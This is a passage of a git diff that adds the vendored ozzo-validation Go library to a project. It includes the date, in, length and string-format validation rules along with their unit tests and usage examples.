valid date. +func (r *dateRule) Error(message string) *dateRule { + r.message = message + return r +} + +// RangeError sets the error message that is used when the value being validated is out of the specified Min/Max date range. +func (r *dateRule) RangeError(message string) *dateRule { + r.rangeMessage = message + return r +} + +// Min sets the minimum date range. A zero value means skipping the minimum range validation. +func (r *dateRule) Min(min time.Time) *dateRule { + r.min = min + return r +} + +// Max sets the maximum date range. A zero value means skipping the maximum range validation. +func (r *dateRule) Max(max time.Time) *dateRule { + r.max = max + return r +} + +// Validate checks if the given value is a valid date. +func (r *dateRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + str, err := EnsureString(value) + if err != nil { + return err + } + + date, err := time.Parse(r.layout, str) + if err != nil { + return errors.New(r.message) + } + + if !r.min.IsZero() && r.min.After(date) || !r.max.IsZero() && date.After(r.max) { + return errors.New(r.rangeMessage) + } + + return nil +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/date_test.go b/vendor/github.com/go-ozzo/ozzo-validation/date_test.go new file mode 100644 index 0000000000..342f1addf8 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/date_test.go @@ -0,0 +1,69 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + "time" + + "github.com/stretchr/testify/assert" +) + +func TestDate(t *testing.T) { + tests := []struct { + tag string + layout string + value interface{} + err string + }{ + {"t1", time.ANSIC, "", ""}, + {"t2", time.ANSIC, "Wed Feb 4 21:00:57 2009", ""}, + {"t3", time.ANSIC, "Wed Feb 29 21:00:57 2009", "must be a valid date"}, + {"t4", "2006-01-02", "2009-11-12", ""}, + {"t5", "2006-01-02", "2009-11-12 21:00:57", "must be a valid date"}, + {"t6", "2006-01-02", "2009-1-12", "must be a valid date"}, + {"t7", "2006-01-02", "2009-01-12", ""}, + {"t8", "2006-01-02", "2009-01-32", "must be a valid date"}, + {"t9", "2006-01-02", 1, "must be either a string or byte slice"}, + } + + for _, test := range tests { + r := Date(test.layout) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestDateRule_Error(t *testing.T) { + r := Date(time.ANSIC) + assert.Equal(t, "must be a valid date", r.message) + assert.Equal(t, "the data is out of range", r.rangeMessage) + r.Error("123") + r.RangeError("456") + assert.Equal(t, "123", r.message) + assert.Equal(t, "456", r.rangeMessage) +} + +func TestDateRule_MinMax(t *testing.T) { + r := Date(time.ANSIC) + assert.True(t, r.min.IsZero()) + assert.True(t, r.max.IsZero()) + r.Min(time.Now()) + assert.False(t, r.min.IsZero()) + assert.True(t, r.max.IsZero()) + r.Max(time.Now()) + assert.False(t, r.max.IsZero()) + + r2 := Date("2006-01-02").Min(time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC)).Max(time.Date(2020, 2, 1, 0, 0, 0, 0, time.UTC)) + assert.Nil(t, r2.Validate("2010-01-02")) + err := r2.Validate("1999-01-02") + if assert.NotNil(t, err) { + assert.Equal(t, "the data is out of range", err.Error()) + } + err2 := r2.Validate("2021-01-02") + if assert.NotNil(t, err) { + assert.Equal(t, "the data is out of range", err2.Error()) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/error.go b/vendor/github.com/go-ozzo/ozzo-validation/error.go new file mode 100644 index 0000000000..d89d628573 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/error.go @@ -0,0 +1,89 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "encoding/json" + "fmt" + "sort" +) + +type ( + // Errors represents the validation errors that are indexed by struct field names, map or slice keys. + Errors map[string]error + + // InternalError represents an error that should NOT be treated as a validation error. + InternalError interface { + error + InternalError() error + } + + internalError struct { + error + } +) + +// NewInternalError wraps a given error into an InternalError. +func NewInternalError(err error) InternalError { + return &internalError{error: err} +} + +// InternalError returns the actual error that it wraps around. +func (e *internalError) InternalError() error { + return e.error +} + +// Error returns the error string of Errors. +func (es Errors) Error() string { + if len(es) == 0 { + return "" + } + + keys := []string{} + for key := range es { + keys = append(keys, key) + } + sort.Strings(keys) + + s := "" + for i, key := range keys { + if i > 0 { + s += "; " + } + if errs, ok := es[key].(Errors); ok { + s += fmt.Sprintf("%v: (%v)", key, errs) + } else { + s += fmt.Sprintf("%v: %v", key, es[key].Error()) + } + } + return s + "." +} + +// MarshalJSON converts the Errors into a valid JSON. +func (es Errors) MarshalJSON() ([]byte, error) { + errs := map[string]interface{}{} + for key, err := range es { + if ms, ok := err.(json.Marshaler); ok { + errs[key] = ms + } else { + errs[key] = err.Error() + } + } + return json.Marshal(errs) +} + +// Filter removes all nils from Errors and returns back the updated Errors as an error. +// If the length of Errors becomes 0, it will return nil. +func (es Errors) Filter() error { + for key, value := range es { + if value == nil { + delete(es, key) + } + } + if len(es) == 0 { + return nil + } + return es +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/error_test.go b/vendor/github.com/go-ozzo/ozzo-validation/error_test.go new file mode 100644 index 0000000000..e7ba9971bb --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/error_test.go @@ -0,0 +1,70 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestNewInternalError(t *testing.T) { + err := NewInternalError(errors.New("abc")) + if assert.NotNil(t, err.InternalError()) { + assert.Equal(t, "abc", err.InternalError().Error()) + } +} + +func TestErrors_Error(t *testing.T) { + errs := Errors{ + "B": errors.New("B1"), + "C": errors.New("C1"), + "A": errors.New("A1"), + } + assert.Equal(t, "A: A1; B: B1; C: C1.", errs.Error()) + + errs = Errors{ + "B": errors.New("B1"), + } + assert.Equal(t, "B: B1.", errs.Error()) + + errs = Errors{} + assert.Equal(t, "", errs.Error()) +} + +func TestErrors_MarshalMessage(t *testing.T) { + errs := Errors{ + "A": errors.New("A1"), + "B": Errors{ + "2": errors.New("B1"), + }, + } + errsJSON, err := errs.MarshalJSON() + assert.Nil(t, err) + assert.Equal(t, "{\"A\":\"A1\",\"B\":{\"2\":\"B1\"}}", string(errsJSON)) +} + +func TestErrors_Filter(t *testing.T) { + errs := Errors{ + "B": errors.New("B1"), + "C": nil, + "A": errors.New("A1"), + } + err := errs.Filter() + assert.Equal(t, 2, len(errs)) + if assert.NotNil(t, err) { + assert.Equal(t, "A: A1; B: B1.", err.Error()) + } + + errs = Errors{} + assert.Nil(t, errs.Filter()) + + errs = Errors{ + "B": nil, + "C": nil, + } + assert.Nil(t, errs.Filter()) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/example_test.go b/vendor/github.com/go-ozzo/ozzo-validation/example_test.go new file mode 100644 index 0000000000..c16face37e --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/example_test.go @@ -0,0 +1,130 @@ +package validation_test + +import ( + "fmt" + "regexp" + + "github.com/go-ozzo/ozzo-validation" + "github.com/go-ozzo/ozzo-validation/is" +) + +type Address struct { + Street string + City string + State string + Zip string +} + +type Customer struct { + Name string + Gender string + Email string + Address Address +} + +func (a Address) Validate() error { + return validation.ValidateStruct(&a, + // Street cannot be empty, and the length must between 5 and 50 + validation.Field(&a.Street, validation.Required, validation.Length(5, 50)), + // City cannot be empty, and the length must between 5 and 50 + validation.Field(&a.City, validation.Required, validation.Length(5, 50)), + // State cannot be empty, and must be a string consisting of two letters in upper case + validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))), + // State cannot be empty, and must be a string consisting of five digits + validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), + ) +} + +func (c Customer) Validate() error { + return validation.ValidateStruct(&c, + // Name cannot be empty, and the length must be between 5 and 20. + validation.Field(&c.Name, validation.Required, validation.Length(5, 20)), + // Gender is optional, and should be either "Female" or "Male". + validation.Field(&c.Gender, validation.In("Female", "Male")), + // Email cannot be empty and should be in a valid email format. + validation.Field(&c.Email, validation.Required, is.Email), + // Validate Address using its own validation rules + validation.Field(&c.Address), + ) +} + +func Example() { + c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + Street: "123 Main Street", + City: "Unknown", + State: "Virginia", + Zip: "12345", + }, + } + + err := c.Validate() + fmt.Println(err) + // Output: + // Address: (State: must be in a valid format.); Email: must be a valid email address. +} + +func Example_second() { + data := "example" + err := validation.Validate(data, + validation.Required, // not empty + validation.Length(5, 100), // length between 5 and 100 + is.URL, // is a valid URL + ) + fmt.Println(err) + // Output: + // must be a valid URL +} + +func Example_third() { + addresses := []Address{ + {State: "MD", Zip: "12345"}, + {Street: "123 Main St", City: "Vienna", State: "VA", Zip: "12345"}, + {City: "Unknown", State: "NC", Zip: "123"}, + } + err := validation.Validate(addresses) + fmt.Println(err) + // Output: + // 0: (City: cannot be blank; Street: cannot be blank.); 2: (Street: cannot be blank; Zip: must be in a valid format.). +} + +func Example_four() { + c := Customer{ + Name: "Qiang Xue", + Email: "q", + Address: Address{ + State: "Virginia", + }, + } + + err := validation.Errors{ + "name": validation.Validate(c.Name, validation.Required, validation.Length(5, 20)), + "email": validation.Validate(c.Name, validation.Required, is.Email), + "zip": validation.Validate(c.Address.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), + }.Filter() + fmt.Println(err) + // Output: + // email: must be a valid email address; zip: cannot be blank. +} + +func Example_five() { + type Employee struct { + Name string + } + + type Manager struct { + Employee + Level int + } + + m := Manager{} + err := validation.ValidateStruct(&m, + validation.Field(&m.Name, validation.Required), + validation.Field(&m.Level, validation.Required), + ) + fmt.Println(err) + // Output: + // Level: cannot be blank; Name: cannot be blank. +} \ No newline at end of file diff --git a/vendor/github.com/go-ozzo/ozzo-validation/in.go b/vendor/github.com/go-ozzo/ozzo-validation/in.go new file mode 100644 index 0000000000..9673dd0ba7 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/in.go @@ -0,0 +1,43 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import "errors" + +// In returns a validation rule that checks if a value can be found in the given list of values. +// Note that the value being checked and the possible range of values must be of the same type. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func In(values ...interface{}) *inRule { + return &inRule{ + elements: values, + message: "must be a valid value", + } +} + +type inRule struct { + elements []interface{} + message string +} + +// Validate checks if the given value is valid or not. +func (r *inRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + for _, e := range r.elements { + if e == value { + return nil + } + } + return errors.New(r.message) +} + +// Error sets the error message for the rule. +func (r *inRule) Error(message string) *inRule { + r.message = message + return r +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/in_test.go b/vendor/github.com/go-ozzo/ozzo-validation/in_test.go new file mode 100644 index 0000000000..ad0c87be80 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/in_test.go @@ -0,0 +1,44 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestIn(t *testing.T) { + var v int = 1 + var v2 *int + tests := []struct { + tag string + values []interface{} + value interface{} + err string + }{ + {"t0", []interface{}{1, 2}, 0, ""}, + {"t1", []interface{}{1, 2}, 1, ""}, + {"t2", []interface{}{1, 2}, 2, ""}, + {"t3", []interface{}{1, 2}, 3, "must be a valid value"}, + {"t4", []interface{}{}, 3, "must be a valid value"}, + {"t5", []interface{}{1, 2}, "1", "must be a valid value"}, + {"t6", []interface{}{1, 2}, &v, ""}, + {"t7", []interface{}{1, 2}, v2, ""}, + } + + for _, test := range tests { + r := In(test.values...) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_inRule_Error(t *testing.T) { + r := In(1, 2, 3) + assert.Equal(t, "must be a valid value", r.message) + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go b/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go new file mode 100644 index 0000000000..ffbeef85b1 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go @@ -0,0 +1,138 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +// Package is provides a list of commonly used string validation rules. +package is + +import ( + "regexp" + "unicode" + + "github.com/asaskevich/govalidator" + "github.com/go-ozzo/ozzo-validation" +) + +var ( + // Email validates if a string is an email or not. + Email = validation.NewStringRule(govalidator.IsEmail, "must be a valid email address") + // URL validates if a string is a valid URL + URL = validation.NewStringRule(govalidator.IsURL, "must be a valid URL") + // RequestURL validates if a string is a valid request URL + RequestURL = validation.NewStringRule(govalidator.IsRequestURL, "must be a valid request URL") + // RequestURI validates if a string is a valid request URI + RequestURI = validation.NewStringRule(govalidator.IsRequestURI, "must be a valid request URI") + // Alpha validates if a string contains English letters only (a-zA-Z) + Alpha = validation.NewStringRule(govalidator.IsAlpha, "must contain English letters only") + // Digit validates if a string contains digits only (0-9) + Digit = validation.NewStringRule(isDigit, "must contain digits only") + // Alphanumeric validates if a string contains English letters and digits only (a-zA-Z0-9) + Alphanumeric = validation.NewStringRule(govalidator.IsAlphanumeric, "must contain English letters and digits only") + // UTFLetter validates if a string contains unicode letters only + UTFLetter = validation.NewStringRule(govalidator.IsUTFLetter, "must contain unicode letter characters only") + // UTFDigit validates if a string contains unicode decimal digits only + UTFDigit = validation.NewStringRule(govalidator.IsUTFDigit, "must contain unicode decimal digits only") + // UTFLetterNumeric validates if a string contains unicode letters and numbers only + UTFLetterNumeric = validation.NewStringRule(govalidator.IsUTFLetterNumeric, "must contain unicode letters and numbers only") + // UTFNumeric validates if a string contains unicode number characters (category N) only + UTFNumeric = validation.NewStringRule(isUTFNumeric, "must contain unicode number characters only") + // LowerCase validates if a string contains lower case unicode letters only + LowerCase = validation.NewStringRule(govalidator.IsLowerCase, "must be in lower case") + // UpperCase validates if a string contains upper case unicode letters only + UpperCase = validation.NewStringRule(govalidator.IsUpperCase, "must be in upper case") + // Hexadecimal validates if a string is a valid hexadecimal number + Hexadecimal = validation.NewStringRule(govalidator.IsHexadecimal, "must be a valid hexadecimal number") + // HexColor validates if a string is a valid hexadecimal color code + HexColor = validation.NewStringRule(govalidator.IsHexcolor, "must be a valid hexadecimal color code") + // RGBColor validates if a string is a valid RGB color in the form of rgb(R, G, B) + RGBColor = validation.NewStringRule(govalidator.IsRGBcolor, "must be a valid RGB color code") + // Int validates if a string is a valid integer number + Int = validation.NewStringRule(govalidator.IsInt, "must be an integer number") + // Float validates if a string is a floating point number + Float = validation.NewStringRule(govalidator.IsFloat, "must be a floating point number") + // UUIDv3 validates if a string is a valid version 3 UUID + UUIDv3 = validation.NewStringRule(govalidator.IsUUIDv3, "must be a valid UUID v3") + // UUIDv4 validates if a string is a valid version 4 UUID + UUIDv4 = validation.NewStringRule(govalidator.IsUUIDv4, "must be a valid UUID v4") + // UUIDv5 validates if a string is a valid version 5 UUID + UUIDv5 = validation.NewStringRule(govalidator.IsUUIDv5, "must be a valid UUID v5") + // UUID validates if a string is a valid UUID + UUID = validation.NewStringRule(govalidator.IsUUID, "must be a valid UUID") + // CreditCard validates if a string is a valid credit card number + CreditCard = validation.NewStringRule(govalidator.IsCreditCard, "must be a valid credit card number") + // ISBN10 validates if a string is an ISBN version 10 + ISBN10 = validation.NewStringRule(govalidator.IsISBN10, "must be a valid ISBN-10") + // ISBN13 validates if a string is an ISBN version 13 + ISBN13 = validation.NewStringRule(govalidator.IsISBN13, "must be a valid ISBN-13") + // ISBN validates if a string is an ISBN (either version 10 or 13) + ISBN = validation.NewStringRule(isISBN, "must be a valid ISBN") + // JSON validates if a string is in valid JSON format + JSON = validation.NewStringRule(govalidator.IsJSON, "must be in valid JSON format") + // ASCII validates if a string contains ASCII characters only + ASCII = validation.NewStringRule(govalidator.IsASCII, "must contain ASCII characters only") + // PrintableASCII validates if a string contains printable ASCII characters only + PrintableASCII = validation.NewStringRule(govalidator.IsPrintableASCII, "must contain printable ASCII characters only") + // Multibyte validates if a string contains multibyte characters + Multibyte = validation.NewStringRule(govalidator.IsMultibyte, "must contain multibyte characters") + // FullWidth validates if a string contains full-width characters + FullWidth = validation.NewStringRule(govalidator.IsFullWidth, "must contain full-width characters") + // HalfWidth validates if a string contains half-width characters + HalfWidth = validation.NewStringRule(govalidator.IsHalfWidth, "must contain half-width characters") + // VariableWidth validates if a string contains both full-width and half-width characters + VariableWidth = validation.NewStringRule(govalidator.IsVariableWidth, "must contain both full-width and half-width characters") + // Base64 validates if a string is encoded in Base64 + Base64 = validation.NewStringRule(govalidator.IsBase64, "must be encoded in Base64") + // DataURI validates if a string is a valid base64-encoded data URI + DataURI = validation.NewStringRule(govalidator.IsDataURI, "must be a Base64-encoded data URI") + // CountryCode2 validates if a string is a valid ISO3166 Alpha 2 country code + CountryCode2 = validation.NewStringRule(govalidator.IsISO3166Alpha2, "must be a valid two-letter country code") + // CountryCode3 validates if a string is a valid ISO3166 Alpha 3 country code + CountryCode3 = validation.NewStringRule(govalidator.IsISO3166Alpha3, "must be a valid three-letter country code") + // DialString validates if a string is a valid dial string that can be passed to Dial() + DialString = validation.NewStringRule(govalidator.IsDialString, "must be a valid dial string") + // MAC validates if a string is a MAC address + MAC = validation.NewStringRule(govalidator.IsMAC, "must be a valid MAC address") + // IP validates if a string is a valid IP address (either version 4 or 6) + IP = validation.NewStringRule(govalidator.IsIP, "must be a valid IP address") + // IPv4 validates if a string is a valid version 4 IP address + IPv4 = validation.NewStringRule(govalidator.IsIPv4, "must be a valid IPv4 address") + // IPv6 validates if a string is a valid version 6 IP address + IPv6 = validation.NewStringRule(govalidator.IsIPv6, "must be a valid IPv6 address") + // DNSName validates if a string is valid DNS name + DNSName = validation.NewStringRule(govalidator.IsDNSName, "must be a valid DNS name") + // Host validates if a string is a valid IP (both v4 and v6) or a valid DNS name + Host = validation.NewStringRule(govalidator.IsHost, "must be a valid IP address or DNS name") + // Port validates if a string is a valid port number + Port = validation.NewStringRule(govalidator.IsPort, "must be a valid port number") + // MongoID validates if a string is a valid Mongo ID + MongoID = validation.NewStringRule(govalidator.IsMongoID, "must be a valid hex-encoded MongoDB ObjectId") + // Latitude validates if a string is a valid latitude + Latitude = validation.NewStringRule(govalidator.IsLatitude, "must be a valid latitude") + // Longitude validates if a string is a valid longitude + Longitude = validation.NewStringRule(govalidator.IsLongitude, "must be a valid longitude") + // SSN validates if a string is a social security number (SSN) + SSN = validation.NewStringRule(govalidator.IsSSN, "must be a valid social security number") + // Semver validates if a string is a valid semantic version + Semver = validation.NewStringRule(govalidator.IsSemver, "must be a valid semantic version") +) + +var ( + reDigit = regexp.MustCompile("^[0-9]+$") +) + +func isISBN(value string) bool { + return govalidator.IsISBN(value, 10) || govalidator.IsISBN(value, 13) +} + +func isDigit(value string) bool { + return reDigit.MatchString(value) +} + +func isUTFNumeric(value string) bool { + for _, c := range value { + if unicode.IsNumber(c) == false { + return false + } + } + return true +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go b/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go new file mode 100644 index 0000000000..7b332bbbf0 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go @@ -0,0 +1,94 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package is + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/stretchr/testify/assert" +) + +func TestAll(t *testing.T) { + tests := []struct { + tag string + rule validation.Rule + valid, invalid string + err string + }{ + {"Email", Email, "test@example.com", "example.com", "must be a valid email address"}, + {"URL", URL, "http://example.com", "examplecom", "must be a valid URL"}, + {"RequestURL", RequestURL, "http://example.com", "examplecom", "must be a valid request URL"}, + {"RequestURI", RequestURI, "http://example.com", "examplecom", "must be a valid request URI"}, + {"Alpha", Alpha, "abcd", "ab12", "must contain English letters only"}, + {"Digit", Digit, "123", "12ab", "must contain digits only"}, + {"Alphanumeric", Alphanumeric, "abc123", "abc.123", "must contain English letters and digits only"}, + {"UTFLetter", UTFLetter, "abc", "123", "must contain unicode letter characters only"}, + {"UTFDigit", UTFDigit, "123", "abc", "must contain unicode decimal digits only"}, + {"UTFNumeric", UTFNumeric, "123", "abc.123", "must contain unicode number characters only"}, + {"UTFLetterNumeric", UTFLetterNumeric, "abc123", "abc.123", "must contain unicode letters and numbers only"}, + {"LowerCase", LowerCase, "abc", "Abc", "must be in lower case"}, + {"UpperCase", UpperCase, "ABC", "ABc", "must be in upper case"}, + {"IP", IP, "74.125.19.99", "74.125.19.999", "must be a valid IP address"}, + {"IPv4", IPv4, "74.125.19.99", "2001:4860:0:2001::68", "must be a valid IPv4 address"}, + {"IPv6", IPv6, "2001:4860:0:2001::68", "74.125.19.99", "must be a valid IPv6 address"}, + {"MAC", MAC, "0123.4567.89ab", "74.125.19.99", "must be a valid MAC address"}, + {"DNSName", DNSName, "example.com", "abc%", "must be a valid DNS name"}, + {"Host", Host, "example.com", "abc%", "must be a valid IP address or DNS name"}, + {"Port", Port, "123", "99999", "must be a valid port number"}, + {"Latitude", Latitude, "23.123", "100", "must be a valid latitude"}, + {"Longitude", Longitude, "123.123", "abc", "must be a valid longitude"}, + {"SSN", SSN, "100-00-1000", "100-0001000", "must be a valid social security number"}, + {"Semver", Semver, "1.0.0", "1.0.0.0", "must be a valid semantic version"}, + {"ISBN", ISBN, "1-61729-085-8", "1-61729-085-81", "must be a valid ISBN"}, + {"ISBN10", ISBN10, "1-61729-085-8", "1-61729-085-81", "must be a valid ISBN-10"}, + {"ISBN13", ISBN13, "978-4-87311-368-5", "978-4-87311-368-a", "must be a valid ISBN-13"}, + {"UUID", UUID, "a987fbc9-4bed-3078-cf07-9141ba07c9f1", "a987fbc9-4bed-3078-cf07-9141ba07c9f3a", "must be a valid UUID"}, + {"UUIDv3", UUIDv3, "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "b987fbc9-4bed-4078-cf07-9141ba07c9f3", "must be a valid UUID v3"}, + {"UUIDv4", UUIDv4, "57b73598-8764-4ad0-a76a-679bb6640eb1", "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "must be a valid UUID v4"}, + {"UUIDv5", UUIDv5, "987fbc97-4bed-5078-af07-9141ba07c9f3", "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "must be a valid UUID v5"}, + {"MongoID", MongoID, "507f1f77bcf86cd799439011", "507f1f77bcf86cd79943901", "must be a valid hex-encoded MongoDB ObjectId"}, + {"CreditCard", CreditCard, "375556917985515", "375556917985516", "must be a valid credit card number"}, + {"JSON", JSON, "[1, 2]", "[1, 2,]", "must be in valid JSON format"}, + {"ASCII", ASCII, "abc", "aabc", "must contain ASCII characters only"}, + {"PrintableASCII", PrintableASCII, "abc", "aabc", "must contain printable ASCII characters only"}, + {"CountryCode2", CountryCode2, "US", "XY", "must be a valid two-letter country code"}, + {"CountryCode3", CountryCode3, "USA", "XYZ", "must be a valid three-letter country code"}, + {"DialString", DialString, "localhost.local:1", "localhost.loc:100000", "must be a valid dial string"}, + {"DataURI", DataURI, "data:image/png;base64,TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdC4=", "image/gif;base64,U3VzcGVuZGlzc2UgbGVjdHVzIGxlbw==", "must be a Base64-encoded data URI"}, + {"Base64", Base64, "TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdC4=", "image", "must be encoded in Base64"}, + {"Multibyte", Multibyte, "abc", "abc", "must contain multibyte characters"}, + {"FullWidth", FullWidth, "3ー0", "abc", "must contain full-width characters"}, + {"HalfWidth", HalfWidth, "abc123い", "0011", "must contain half-width characters"}, + {"VariableWidth", VariableWidth, "3ー0123", "abc", "must contain both full-width and half-width characters"}, + {"Hexadecimal", Hexadecimal, "FEF", "FTF", "must be a valid hexadecimal number"}, + {"HexColor", HexColor, "F00", "FTF", "must be a valid hexadecimal color code"}, + {"RGBColor", RGBColor, "rgb(100, 200, 1)", "abc", "must be a valid RGB color code"}, + {"Int", Int, "100", "1.1", "must be an integer number"}, + {"Float", Float, "1.1", "a.1", "must be a floating point number"}, + {"VariableWidth", VariableWidth, "", "", ""}, + } + + for _, test := range tests { + err := test.rule.Validate("") + assert.Nil(t, err, test.tag) + err = test.rule.Validate(test.valid) + assert.Nil(t, err, test.tag) + err = test.rule.Validate(&test.valid) + assert.Nil(t, err, test.tag) + err = test.rule.Validate(test.invalid) + assertError(t, test.err, err, test.tag) + err = test.rule.Validate(&test.invalid) + assertError(t, test.err, err, test.tag) + } +} + +func assertError(t *testing.T, expected string, err error, tag string) { + if expected == "" { + assert.Nil(t, err, tag) + } else if assert.NotNil(t, err, tag) { + assert.Equal(t, expected, err.Error(), tag) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/length.go b/vendor/github.com/go-ozzo/ozzo-validation/length.go new file mode 100644 index 0000000000..752df45d5e --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/length.go @@ -0,0 +1,77 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "fmt" + "unicode/utf8" +) + +// Length returns a validation rule that checks if a value's length is within the specified range. +// If max is 0, it means there is no upper bound for the length. +// This rule should only be used for validating strings, slices, maps, and arrays. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func Length(min, max int) *lengthRule { + message := "the value must be empty" + if min == 0 && max > 0 { + message = fmt.Sprintf("the length must be no more than %v", max) + } else if min > 0 && max == 0 { + message = fmt.Sprintf("the length must be no less than %v", min) + } else if min > 0 && max > 0 { + message = fmt.Sprintf("the length must be between %v and %v", min, max) + } + return &lengthRule{ + min: min, + max: max, + message: message, + } +} + +// RuneLength returns a validation rule that checks if a string's rune length is within the specified range. +// If max is 0, it means there is no upper bound for the length. +// This rule should only be used for validating strings, slices, maps, and arrays. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +// If the value being validated is not a string, the rule works the same as Length. +func RuneLength(min, max int) *lengthRule { + r := Length(min, max) + r.rune = true + return r +} + +type lengthRule struct { + min, max int + message string + rune bool +} + +// Validate checks if the given value is valid or not. +func (v *lengthRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + var ( + l int + err error + ) + if s, ok := value.(string); ok && v.rune { + l = utf8.RuneCountInString(s) + } else if l, err = LengthOfValue(value); err != nil { + return err + } + + if v.min > 0 && l < v.min || v.max > 0 && l > v.max { + return errors.New(v.message) + } + return nil +} + +// Error sets the error message for the rule. +func (v *lengthRule) Error(message string) *lengthRule { + v.message = message + return v +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/length_test.go b/vendor/github.com/go-ozzo/ozzo-validation/length_test.go new file mode 100644 index 0000000000..5eda7317cc --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/length_test.go @@ -0,0 +1,90 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "database/sql" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestLength(t *testing.T) { + var v *string + tests := []struct { + tag string + min, max int + value interface{} + err string + }{ + {"t1", 2, 4, "abc", ""}, + {"t2", 2, 4, "", ""}, + {"t3", 2, 4, "abcdf", "the length must be between 2 and 4"}, + {"t4", 0, 4, "ab", ""}, + {"t5", 0, 4, "abcde", "the length must be no more than 4"}, + {"t6", 2, 0, "ab", ""}, + {"t7", 2, 0, "a", "the length must be no less than 2"}, + {"t8", 2, 0, v, ""}, + {"t9", 2, 0, 123, "cannot get the length of int"}, + {"t10", 2, 4, sql.NullString{String: "abc", Valid: true}, ""}, + {"t11", 2, 4, sql.NullString{String: "", Valid: true}, ""}, + {"t12", 2, 4, &sql.NullString{String: "abc", Valid: true}, ""}, + } + + for _, test := range tests { + r := Length(test.min, test.max) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestRuneLength(t *testing.T) { + var v *string + tests := []struct { + tag string + min, max int + value interface{} + err string + }{ + {"t1", 2, 4, "abc", ""}, + {"t1.1", 2, 3, "💥💥", ""}, + {"t1.2", 2, 3, "💥💥💥", ""}, + {"t1.3", 2, 3, "💥", "the length must be between 2 and 3"}, + {"t1.4", 2, 3, "💥💥💥💥", "the length must be between 2 and 3"}, + {"t2", 2, 4, "", ""}, + {"t3", 2, 4, "abcdf", "the length must be between 2 and 4"}, + {"t4", 0, 4, "ab", ""}, + {"t5", 0, 4, "abcde", "the length must be no more than 4"}, + {"t6", 2, 0, "ab", ""}, + {"t7", 2, 0, "a", "the length must be no less than 2"}, + {"t8", 2, 0, v, ""}, + {"t9", 2, 0, 123, "cannot get the length of int"}, + {"t10", 2, 4, sql.NullString{String: "abc", Valid: true}, ""}, + {"t11", 2, 4, sql.NullString{String: "", Valid: true}, ""}, + {"t12", 2, 4, &sql.NullString{String: "abc", Valid: true}, ""}, + {"t13", 2, 3, &sql.NullString{String: "💥💥", Valid: true}, ""}, + {"t14", 2, 3, &sql.NullString{String: "💥", Valid: true}, "the length must be between 2 and 3"}, + } + + for _, test := range 